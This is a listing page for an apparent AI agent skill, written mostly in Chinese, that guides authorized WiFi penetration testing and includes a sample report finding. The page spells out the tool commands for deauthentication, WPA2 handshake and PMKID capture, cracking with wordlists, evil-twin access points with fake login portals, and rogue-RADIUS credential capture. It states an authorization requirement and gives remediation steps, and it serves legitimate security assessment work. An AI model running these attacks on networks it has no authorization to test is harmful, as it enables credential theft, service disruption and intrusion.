Conducts authorized wireless network penetration tests including weak encryption checks, evil twin attacks, WPA2/WPA3 handshake capture, rogue AP detection, and client attacks to assess WiFi security.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 评估企业无线网络的安全性,包括访客、企业和 IoT WiFi 段
Conducts authorized WiFi penetration tests assessing weak encryption, captive portals, evil twin attacks, WPA2/WPA3 handshakes, rogue APs, client attacks, authentication, segmentation, and WIDS effectiveness.
Performs WiFi penetration tests: captures handshakes, cracks WPA2/WPA3 keys, detects rogue APs, tests segmentation using Aircrack-ng, Kismet on Kali Linux.
Guides authorized WiFi penetration testing: reconnaissance, WPA2/WPA3 handshake capture, evil twin attacks, rogue AP detection, and WIDS evaluation using aircrack-ng on Kali Linux.
Share bugs, ideas, or general feedback.
不适用场景:未经网络所有者书面授权的无线网络测试、未明确授权的无线基础设施干扰或拒绝服务攻击,以及无线中断可能影响生命安全系统的环境。
发现并映射目标环境中的所有无线网络:
airmon-ng start wlan0airodump-ng wlan0mon -w recon --output-format csv,pcap 以发现所有 SSID、BSSID、信道、加密类型和已连接客户端airodump-ng wlan0mon --essid-regex ".*" -c <channel>对于 WPA2-PSK 网络,捕获四次握手并尝试离线破解:
airodump-ng wlan0mon -c <channel> --bssid <bssid> -w captureaireplay-ng -0 5 -a <bssid> -c <client_mac> wlan0monaircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.caphashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txthashcat -m 22000 capture.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rulehcxdumptool -i wlan0mon --enable_status=1 -o pmkid.pcapng --filtermode=2 --filterlist_ap=<bssid>对于 802.1X/EAP 网络,通过流氓 RADIUS 尝试凭据捕获:
hostapd-mana 配合流氓 RADIUS 服务器设置模拟企业 SSID 的流氓 APasleap 破解捕获的凭据,或转换为 hashcat 格式:hashcat -m 5500 captured_ntlm.txt wordlist.txt部署流氓接入点以拦截客户端连接:
hostapddnsmasq 为 DHCP 和 DNS 设置强制门户,配合提供虚假登录页面的 Web 服务器获得无线网络访问权限后,评估网络分段:
nmap -sn <wireless_subnet>| 术语 | 定义 |
|---|---|
| 邪恶双胞胎 | 模拟合法 SSID 的流氓接入点,诱使客户端连接,从而实现中间人攻击和凭据捕获 |
| 四次握手 | 客户端与 AP 之间建立加密密钥的 WPA2 认证交换;捕获的握手可离线破解 |
| WPA3-SAE | 对等同步认证;WPA3 的密钥交换协议,可抵抗离线字典攻击并提供前向保密 |
| 过渡模式 | WPA3 向后兼容模式,同时支持 WPA2 和 WPA3 客户端,可能存在降级攻击漏洞 |
| PMKID 攻击 | 从 AP 的第一个 EAPOL 帧中捕获成对主密钥标识符的无客户端攻击,允许在不捕获完整握手的情况下进行离线破解 |
| 802.1X/EAP | 使用 RADIUS 和可扩展认证协议的企业无线认证,提供每用户凭据而非共享预共享密钥 |
| 取消认证攻击 | 发送伪造的取消认证帧将客户端从 AP 断开,迫使重新连接,从而实现握手捕获或邪恶双胞胎攻击 |
背景:一家金融服务公司有 3 个 SSID:CorpWiFi(员工使用的 WPA2-Enterprise)、GuestWiFi(强制门户)和 IoT-Net(打印机和会议系统使用的 WPA2-PSK)。测试人员被授权在大厅和会议室测试所有三个网络。
方法:
常见陷阱:
## 发现:IoT 网络上的弱 WPA2-PSK 且网络分段不足
**ID**: WIFI-001
**严重性**: 严重(CVSS 9.4)
**受影响 SSID**: IoT-Net(BSSID: AA:BB:CC:DD:EE:FF)
**加密**: WPA2-Personal(PSK)
**描述**:
IoT 无线网络使用了弱预共享密钥,通过标准字典攻击在 3 分钟内被破解。
连接到 IoT-Net 后,测试人员发现无线 VLAN 未与内部企业网络正确分段,
提供了对文件服务器、活动目录域控制器和内部数据库服务器的无限制访问。
**概念验证**:
1. 捕获 WPA2 握手:airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w iot
2. 在 3 分钟内破解 PSK:aircrack-ng -w rockyou.txt iot-01.cap -> 密钥:Company2024!
3. 连接到 IoT-Net 并扫描:nmap -sn 10.20.0.0/24
4. 从 IoT-Net 可访问:DC01(10.20.0.5:445)、FILESVR(10.20.0.10:445)、DBSVR(10.20.0.15:3306)
**影响**:
无线范围内的攻击者(从公共大厅测试)可以加入 IoT 网络并直接访问企业基础设施,
绕过员工访问所需的 WPA2-Enterprise 认证。
**修复建议**:
1. 为 IoT-Net 实施 20+ 字符的复杂 PSK,每季度轮换
2. 部署 VLAN 分段以隔离 IoT-Net 与企业网络
3. 实施防火墙规则,只允许 IoT 设备访问其所需的服务
4. 在支持的情况下,将 IoT 设备迁移到使用设备证书的 802.1X 认证
5. 部署 WIDS 以检测取消认证攻击和流氓接入点